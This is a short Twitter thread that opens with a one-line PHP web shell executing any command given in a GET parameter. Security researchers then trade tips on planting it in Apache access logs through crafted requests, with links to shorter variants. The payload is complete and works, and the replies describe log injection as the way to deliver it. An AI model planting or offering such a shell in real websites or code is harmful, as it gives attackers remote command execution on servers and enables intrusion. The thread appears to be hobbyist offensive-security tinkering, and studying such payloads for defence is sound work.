Shortest PHP Web Shell: <?=`$_GET[1]`?>
-
-
@avlidienbrunn But without "?>" it does not work when injected into an existing file (like logs). -
@brutelogic@avlidienbrunn The shortest I could come up with (with default apache log format) was this:http://pastebin.com/driEFF8Y -
@brutelogic@avlidienbrunn the evaluating part would end up as: */`$_`?> See this paste: http://pastebin.com/0axFKfZ9 -
@brutelogic@avlidienbrunn it's pretty much cheating, but you'll get the point. -
@Almroot@avlidienbrunn Why not injecting as it is, after "GET /"? -
@brutelogic@avlidienbrunn you could do that! it just thought it was funny to tinker with http-parsing, log formats and the php interpreter. -
@Almroot@avlidienbrunn Ok, well done.
End of conversation
New conversation -
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.